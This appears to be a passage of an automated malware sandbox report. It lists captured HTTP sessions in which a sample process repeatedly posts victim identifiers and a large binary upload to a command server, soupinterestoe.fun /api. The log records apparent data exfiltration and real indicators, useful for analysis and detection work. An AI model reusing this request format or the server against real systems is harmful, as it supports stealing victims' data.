Dec 27, 2023 17:58:27.017535925 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:27.562103033 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=fe6v9kl2r8sn9pg38gt550i2u7; expires=Sun, 21-Apr-2024 10:45:06 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:27 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:27 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:27 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1hTsrY246GAKMBymyCik%2BUJkd36TGFuwltXpm0WEfgruTXzlJC%2B7co0q0uDICgrclaGOd0MEY6cRQ1OmqknKL10oWayKLmjRdlRleorwCdmU2zU1oUcbasu2wBdhxYoLJNUzfEw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bbf4a27e Data Raw: Data Ascii:
Dec 27, 2023 17:58:27.562127113 CET	37	IN	Data Raw: 34 32 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 42-DFW15Malformed packet data
Dec 27, 2023 17:58:27.562139988 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49846	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:28.889286041 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:28.889461994 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:29.277424097 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=seitnhperb2s75cil8152ia5hq; expires=Sun, 21-Apr-2024 10:45:08 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mh6AUrrTBw54quQ1N%2BipsPqe83%2BQTM8gO0aafPY4AC7aBHGCYTb96rpoeYG1ULKFoG%2FYFM0%2BFYuscIMf58rAhXRxjvfiEwBAjQsbQ1Tbv330skFqzNhvjbjV7olizTK3FNrJlnU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bcaf Data Raw: Data Ascii:
Dec 27, 2023 17:58:29.277441978 CET	41	IN	Data Raw: 38 62 34 36 64 31 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 8b46d1-DFW15Malformed packet data
Dec 27, 2023 17:58:29.277455091 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49847	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:29.795871019 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20433 Host: soupinterestoe.fun
Dec 27, 2023 17:58:29.796030045 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:29.917954922 CET	1286	OUT	Data Raw: a9 1d df 7f 5a eb bb ee 3a 6f 67 0e f5 3b d8 cd 95 36 76 1a 97 98 ec ba a2 17 06 db f3 9c db d8 7f 9f d5 cd f5 eb 7a cb a5 5d 5d d6 e7 b3 d1 23 53 af ee 5a 43 6a dd 72 d6 12 07 fb f5 b5 56 78 63 47 ed 23 6b 65 8d 16 33 d9 91 03 51 5f 89 8d 7d cd Data Ascii: Z:og;6vz]]#SZCjrVxcG#ke3Q_}GD6euZvcO">3'G6gu:'Gi~f~4?Tvd}K~;j4Y{<vo}j+RXz/v-Kt.MB]-tZ+
Dec 27, 2023 17:58:29.917979956 CET	2572	OUT	Data Raw: 99 fd cc e1 b3 d9 f6 db cc 4d bf 76 39 d3 7e fb d0 bd 7f fd b9 81 f6 db c7 16 5e 78 30 dd 7e fb e1 57 3f f0 a1 54 fb ed 57 0b 57 be 91 cc a5 06 72 bb 6e b9 34 fe bd df 1d 8a da cb 86 b3 41 f8 dd f0 0f c2 cf 85 ff 22 fc d5 f0 a3 51 14 00 00 00 00 Data Ascii: Mv9~^x0~W?TWWrn4A"Q5'1W-+/^8+1+1uZuqYIFo?~?n(o!T.L:5t J
Dec 27, 2023 17:58:29.918261051 CET	5001	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 eb da 70 1c 2c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 5d 1b 8a 83 a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: p,p]kqum(SZiTf
Dec 27, 2023 17:58:30.521260023 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=t44rgfapr1qu5fprr4dutrpnh7; expires=Sun, 21-Apr-2024 10:45:09 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jqn5ZNoplZcN6MftvDW0zMO5bAP6s5QiPtgCQzkYHx6DXeaGLL4sT%2FNWP63RKyEL%2FiR4JbTC81o%2BRQywxHnx1yxvr04z2BfMoeaK9roDmKeRaRZIJT0MCTj3nmza2FHR03Kq7nM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bd0abe Data Raw: Data Ascii:
Dec 27, 2023 17:58:30.521318913 CET	32	IN	Data Raw: 65 39 61 64 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: e9ad-DFWfok 212.102.41.2
Dec 27, 2023 17:58:30.521357059 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49851	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:37.374356985 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:37.374566078 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:37.757630110 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=ae1ov2ae2d6ac8v732q6kbd136; expires=Sun, 21-Apr-2024 10:45:16 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:37 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:37 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:37 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qG9Oa8lr7YSbGY6UG546n3i6jJ20pfccn9k0CcDcCyVdEW7TC7vVsGm9TiLjLmKmGvhbKt8L0zWaFLYHbhXrciBKgQtQ7edpR3aEZkRzfwKJJRsp%2BrGgyZMV1pqkM1lj2o7qTBI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31bfffd37aa8 Data Raw: Data Ascii:
Dec 27, 2023 17:58:37.757652044 CET	35	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: -DFW15Malformed packet data
Dec 27, 2023 17:58:37.757663965 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49852	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:38.124496937 CET	366	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7210 Host: soupinterestoe.fun
Dec 27, 2023 17:58:38.124732018 CET	7210	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:38.665992022 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=q976u0mk3eg6vgh40mfvtqu96v; expires=Sun, 21-Apr-2024 10:45:17 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WtxMXBWu%2BzrkSBHlMF6Lc%2BN8UQdSRMfHbZvf6V%2FdDPZ%2BwqX5Lcr69GqIT%2FnWX2IJwmJulYqxiuWmhAyp7iJboVyeyjxIbeP4ECm%2BOU1F1YETrR5CL8EFIyZkBVgcE48C8aE4CWE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:38.666023016 CET	38	IN	Data Raw: 30 34 61 61 30 32 34 37 39 34 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 04aa024794-DFWfok 212.102.41.2
Dec 27, 2023 17:58:38.666045904 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49853	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:38.989208937 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:38.989475965 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:39.370867014 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=3u81h5f4p8lh295o9alpeeesqu; expires=Sun, 21-Apr-2024 10:45:18 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:39 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:39 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:39 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Xg%2FXhUlIHDEp0skwQyX72yDJfgpFLqQ70au%2B43NfRGyyMRzQwp5BO0TcEDp9lch1tyjl%2FVT3sm8mnVvoL%2BXUfA1sLkiewp7%2BIfN6%2B0feugrMie3tBMdWEC%2BDhfWnFGTek5A5Ts%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 17:58:39.370893002 CET	47	IN	Data Raw: 31 63 30 61 31 38 36 30 65 61 61 30 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 1c0a1860eaa0-DFW15Malformed packet data
Dec 27, 2023 17:58:39.370908022 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49854	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:39.580665112 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:39.580929995 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:39.967478037 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=c899qcf8puo49d55id3egokf9j; expires=Sun, 21-Apr-2024 10:45:18 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:39 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:39 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:39 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5XIIWng3ZlNfDc6dQNphh18210kxWOr3TE%2BTcoVVzY0TZQJZHJZ2IyZgrrMpIlh%2B6qSnfHLbqPrF7su3VGVfkjZ%2B%2FGphsFCaq5Po9%2FZiz9UofSuOshG%2FjTXGu9nDVPGSP%2B06hSc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c Data Raw: Data Ascii:
Dec 27, 2023 17:58:39.967494011 CET	47	IN	Data Raw: 31 63 30 64 63 39 35 38 65 37 30 32 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 1c0dc958e702-DFW15Malformed packet data
Dec 27, 2023 17:58:39.967506886 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49856	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:40.145756006 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:58:40.146032095 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:40.534406900 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=og9faeof9rj4lvshqjfh6kmh8i; expires=Sun, 21-Apr-2024 10:45:19 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:40 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WVYnlt5zwJULQlFScUOdQ7b6oMM2L%2FdKHXHFBR946WOmxpyA7OenN2jv809BNvrx%2FZ0YfzBG8cJExkc4BmKLFGQos7DO17haPn52snFdSSDNGA6PjiHHnUbBkLl3R2ZoXx4ycPw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31c114a892 Data Raw: Data Ascii:
Dec 27, 2023 17:58:40.534429073 CET	37	IN	Data Raw: 64 61 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: da-DFW15Malformed packet data
Dec 27, 2023 17:58:40.534442902 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49857	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:40.722521067 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
